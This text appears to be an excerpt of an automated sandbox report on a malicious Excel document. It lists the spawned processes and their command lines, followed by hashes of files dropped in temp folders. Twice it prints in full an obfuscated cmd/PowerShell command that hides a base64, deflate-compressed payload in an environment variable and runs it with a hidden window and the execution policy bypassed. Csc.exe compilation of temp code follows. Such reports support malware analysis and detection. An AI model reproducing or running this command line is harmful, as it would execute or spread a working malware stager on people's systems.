cmd.exe (PID: 3880 cmdline: CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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' ), [SySTEM.IO.comPREsSiOn.compreSSionMODE]::DEcoMpresS ) ^| FOReach{neW-oBjecT IO.STreamreadEr($_, [SySTem.TExt.enCODINg]::aScIi) }^|FOrEAch {$_.rEadToenD()} ) && poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )' MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 4060 cmdline: poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

csc.exe (PID: 4020 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)

cvtres.exe (PID: 2552 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)

cmd.exe (PID: 968 cmdline: CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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' ), [SySTEM.IO.comPREsSiOn.compreSSionMODE]::DEcoMpresS ) ^| FOReach{neW-oBjecT IO.STreamreadEr($_, [SySTem.TExt.enCODINg]::aScIi) }^|FOrEAch {$_.rEadToenD()} ) && poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )' MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 1968 cmdline: poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

csc.exe (PID: 4016 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)

cvtres.exe (PID: 2648 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\CabD512.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 56560 bytes, 1 file
Size (bytes):	56560
Entropy (8bit):	7.995785157236685
Encrypted:	true
MD5:	BB377DF27A55C05BB3793CD1E125C869
SHA1:	295D5A7CB802A8058059F6C29DC2491A15A7D55C
SHA-256:	3C4EC495F17D21CC236BC7238BC02728BD945C07157FBF875CAC340269AFC207
SHA-512:	AA074C05ACDA3414436A3EE01890C08024D6AF96868D856DF0382C9BA531D6701A6EF45A6A0C80FF21670BCF94AE7F1ED5FDEB0E4FA7A5BABF6F8D9FB19F06DC
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user~1\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Size (bytes):	241332
Entropy (8bit):	4.294730797084914
Encrypted:	false
MD5:	17D3C43892A6449F72F37571B7F48051
SHA1:	D33AB2503F94A75669132E6EFBE4B7C905FEDF30
SHA-256:	9479C0042312A13F0A2BA563A8D4C5D1F7149244E1910814B24500A9A9276847
SHA-512:	537410642075DA19045D18A905B9B310B590D57074C9E633FEB6ADB4DBE9C5289E301A5CA21E00B42167B9FFA08850448F7464819B8ABCC777CEBF929B199726
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	data
Size (bytes):	2060
Entropy (8bit):	2.4065064457899203
Encrypted:	false
MD5:	30975A327A52E5B9A0E7F6BE195749DC
SHA1:	7B88AE7917BADD434B8344CAA24CCBA0A224E756
